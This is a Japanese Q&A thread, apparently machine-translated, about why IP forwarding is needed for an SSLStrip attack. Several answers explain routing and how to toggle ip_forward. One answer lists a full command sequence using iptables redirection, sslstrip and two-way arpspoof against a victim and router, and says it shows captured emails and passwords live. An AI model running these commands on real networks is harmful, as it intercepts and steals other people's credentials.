SSLStrip
攻撃では、IP forwarding
次のコマンドを使用して有効にする必要があります。
echo 1 > /proc/sys/net/ipv4/ip_forward
このコマンドは、ホストが2つのネットワーク間でパケットを転送するルータとして機能できることを理解しています。これが私の混乱です。ネットワークインターフェイスが1つしかありませんが、なぜIP転送を設定できますか?eth0
私の箱にあるのはこれがどのように機能するのでしょうか?
インターフェイスが1つしかない場合、転送は機能しますか?私たち二人はいなければなりませんか?
答え1
NIC(あなたの場合はeth0)が物理的に接続されたネットワークのみを考慮しているので、混乱しています。ただし、コンピュータはより多くのネットワークにアクセスできます。
お使いのコンピュータでIP転送を有効にすると、意図しないパケットを受信したときに通知されます。今後これを破棄するのではなく、ターゲット(またはネクストホップ)に移動します。この場合、お使いのコンピュータは次のように動作します。ゲートウェイその特定の目的地へ。
答え2
ポート転送を有効にすると、コンピュータのIP(eth0)をゲートウェイとして設定し、パケットを送信できます。 iptables FORWARDリンクがこれらのパケットを受け入れると、そのパケットを宛先に転送します。
答え3
root@kali# echo 1 > /proc/sys/net/ipv4/ip_forward
root@kali# iptables -t nat -A PREROUTING --dport 80 -j REDIRECT --to-port 1000
root@kali# sslstrip -a -l 1000 -k
今新しい端末で書く
root@kali# arpspoof -i eth0 victimip routerip
新しい端末に記入してください。
root@kali# arpspoof -i eth0 routerip victimip
リアルタイムの電子メールとパスワードを表示するには、別の端末を作成する必要があります。
root@kali# tail -f sslstrip.log
注意:すべての端末を閉じてはいけません。
出力番号 1 は、IP 転送が有効であることを示します。上記の値はLinux procファイルシステム、より正確には実際のファイルファイル/proc/sys/net/ipv4/ip_forward
から読み取られます。
# cat /proc/sys/net/ipv4/ip_forward
1
実行中のLinuxシステムでIP転送を無効にするには、次の手順を実行します。
# echo 0 > /proc/sys/net/ipv4/ip_forward
上記の変更は再起動後も保持されません。 Linux システムで IP 転送を永久に無効にするには、/etc/sysctl.conf
次の行を編集して追加します。
net.ipv4.ip_forward = 0
Linux で IP 転送を有効にするプロセスは上記の無効化と同じですが、数値 1 を使用して IP 転送を有効にします。
# echo 1 > /proc/sys/net/ipv4/ip_forward
変更を永続的に適用するには、editに次の行を挿入または編集します/etc/sysctl.conf
。
net.ipv4.ip_forward = 1